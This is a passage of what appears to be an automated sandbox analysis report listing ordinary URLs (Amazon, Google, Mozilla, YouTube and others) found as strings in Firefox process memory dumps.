Source: firefox.exe, 00000015.00000002.2938420212.00000259401AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2952417248.0000025942489000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2919695391.000002593A71C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2821255219.00000259401AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2964435246.00003F69D5E04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.00000259344DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C87C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://weibo.com/
Source: firefox.exe, 00000015.00000002.2939307905.000002594022D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2789894282.000002594023C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3124908460.000001EF35B83000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
Source: firefox.exe, 00000015.00000002.2944148777.0000025940561000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2820604619.0000025940561000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2919695391.000002593A71C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2808209221.000002593A467000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.00000259344DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C87C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 00000015.00000002.2944148777.0000025940561000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2820604619.0000025940561000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2805571289.000002593B79F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2964435246.00003F69D5E04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.ca/
Source: firefox.exe, 00000015.00000002.2952417248.0000025942489000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2808209221.000002593A467000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.co.uk/
Source: firefox.exe, 00000015.00000002.2940088335.00000259403B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2805571289.000002593B79F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2963140351.00001F079B900000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2964435246.00003F69D5E04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2963866373.0000352952600000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/
Source: firefox.exe, 00000015.00000002.2880770582.00000259339AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935888000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.000002593582E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.2867917308.000002ADC16E4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2867425093.000001CBE7AEB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: firefox.exe, 00000015.00000003.2815909694.0000025940698000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2757347333.0000025937E81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.0000025934427000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2915888122.000002593A23A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2756907545.0000025937E3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2757162605.0000025937E60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.0000025934447000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3085049318.000001EF2E9DC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3083282313.000001EF2E582000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3055217724.000001EF29E72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3055217724.000001EF29EDA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 00000015.00000002.2884059485.0000025934308000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2949650956.0000025941103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozill
Source: firefox.exe, 00000015.00000002.2944148777.0000025940561000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2820604619.0000025940561000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2805571289.000002593B79F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2964435246.00003F69D5E04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.de/
Source: firefox.exe, 00000015.00000002.2944148777.0000025940561000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2820604619.0000025940561000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2805571289.000002593B79F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2964435246.00003F69D5E04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.fr/
Source: firefox.exe, 00000015.00000002.2952417248.0000025942489000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2919695391.000002593A71C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2964435246.00003F69D5E04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.00000259344DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C87C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.avito.ru/
Source: firefox.exe, 00000015.00000002.2924708904.000002593AC08000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2919695391.000002593A71C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2964435246.00003F69D5E04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.00000259344DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C87C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.baidu.com/
Source: firefox.exe, 00000015.00000002.2952417248.0000025942489000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2964435246.00003F69D5E04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bbc.co.uk/
Source: firefox.exe, 00000015.00000002.2880770582.00000259339AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935888000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.000002593582E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.2867917308.000002ADC16E4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2867425093.000001CBE7AEB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: firefox.exe, 00000015.00000002.2963140351.00001F079B900000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2964435246.00003F69D5E04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.00000259344DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C87C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ctrip.com/
Source: firefox.exe, 00000015.00000002.2924708904.000002593AC08000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2964435246.00003F69D5E04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.co.uk/
Source: firefox.exe, 00000015.00000002.2944148777.0000025940561000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2820604619.0000025940561000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2805571289.000002593B79F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2964435246.00003F69D5E04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.de/
Source: firefox.exe, 00000015.00000002.2924708904.000002593AC08000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2964435246.00003F69D5E04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2944981005.0000025940689000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2816233899.0000025940689000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: firefox.exe, 00000015.00000002.2940088335.0000025940359000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/
Source: firefox.exe, 00000015.00000002.2944981005.000002594066F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2793586096.00000259404C4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2797711780.0000025940444000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2816457923.000002594066F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 00000015.00000002.2884059485.0000025934308000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2756585177.0000025938200000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2757347333.0000025937E81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2756907545.0000025937E3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2757162605.0000025937E60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3083282313.000001EF2E582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: firefox.exe, 00000015.00000002.2884763162.0000025934403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/policies/privacy/
Source: firefox.exe, 00000015.00000002.2884763162.0000025934403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/policies/privacy/media.gmp-manager.cert.checkAttributesFailed
Source: firefox.exe, 00000015.00000003.2816546786.000002594063F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2757162605.0000025937E60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.00000259344DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.0000025934447000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3086366052.000001EF2EB9E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3083282313.000001EF2E582000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3055217724.000001EF29E72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3055217724.000001EF29EDA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 00000015.00000002.2894066055.0000025937812000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.0000025934427000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.00000259344DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A478000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: firefox.exe, 00000015.00000002.2952417248.0000025942489000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2919695391.000002593A71C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2964435246.00003F69D5E04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.00000259344DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C87C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 00000015.00000002.2952417248.0000025942489000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2919695391.000002593A71C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2964435246.00003F69D5E04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.00000259344DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C87C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/
Source: firefox.exe, 00000015.00000002.2952417248.0000025942489000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2808209221.000002593A467000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.leboncoin.fr/
Source: firefox.exe, 00000015.00000002.2881592543.0000025933AA7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2816233899.000002594067D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2961121442.0000039FA2504000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2815909694.000002594068F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2940088335.000002594031B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2866949692.000000C167F7C000.00000004.00000010.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2944981005.0000025940689000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2879062103.0000025928391000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3051133453.000001EF29652000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3043047343.0000002781BFC000.00000004.00000010.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3053931812.000001EF29D9F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: firefox.exe, 00000015.00000002.2884763162.0000025934427000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2808950277.00000259407D2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2811265427.00000259407C0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: firefox.exe, 00000015.00000002.2944981005.000002594067D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2816233899.000002594067D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2911918698.000002593960A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: firefox.exe, 00000015.00000002.2944981005.000002594067D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2816233899.000002594067D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2911918698.000002593960A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: firefox.exe, 00000015.00000002.2880770582.000002593395D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.2867917308.000002ADC16C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2867425093.000001CBE7AC7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3051610280.000001EF29754000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 00000015.00000002.2889978017.0000025935888000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 00000015.00000002.2940088335.00000259403B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-contentP
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 00000015.00000002.2940088335.00000259403B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/V
Source: firefox.exe, 00000015.00000002.2878414441.000001EDFCC04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2929941467.000002593B67D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3115028552.000001EF311BB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3127918517.0000093E7B300000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com
Source: firefox.exe, 00000015.00000002.2944148777.0000025940561000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2938420212.00000259401AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2820604619.0000025940561000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2821255219.00000259401AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2964435246.00003F69D5E04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.olx.pl/
Source: firefox.exe, 00000015.00000002.2884763162.0000025934403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2881592543.0000025933AD8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.00000259344B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3093596706.000001EF2F303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 00000015.00000002.2940088335.00000259403B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2805571289.000002593B79F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2963140351.00001F079B900000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.000002593582E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2964435246.00003F69D5E04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 00000015.00000002.2878414441.000001EDFCC04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3127918517.0000093E7B300000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.tsn.ca
Source: firefox.exe, 00000015.00000002.2884763162.0000025934403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.widevine.com/
Source: firefox.exe, 00000015.00000002.2884763162.0000025934403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.widevine.com/findUpdates()
Source: firefox.exe, 00000015.00000002.2944148777.0000025940561000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2820604619.0000025940561000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2805571289.000002593B79F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2964435246.00003F69D5E04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.wykop.pl/
Source: firefox.exe, 00000015.00000002.2940088335.00000259403A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2964435246.00003F69D5E04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.00000259344DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2931474157.000002593B7FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2867425093.000001CBE7A03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C87C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3055217724.000001EF29E72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 00000015.00000002.2963140351.00001F079B900000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/Z
Source: firefox.exe, 00000015.00000002.2938420212.00000259401AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2805571289.000002593B79F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2919695391.000002593A71C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2821255219.00000259401AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2964435246.00003F69D5E04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.00000259344DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C87C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 00000015.00000002.2919125459.000002593A62C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2915569464.000002593A103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2919125459.000002593A603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3085049318.000001EF2E98B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3085049318.000001EF2E903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warning
Source: firefox.exe, 00000015.00000002.2908644373.0000025939040000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warningThe
Source: firefox.exe, 00000015.00000002.2964091165.0000370D2CF04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3121604934.000001EF35723000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://yandex.com
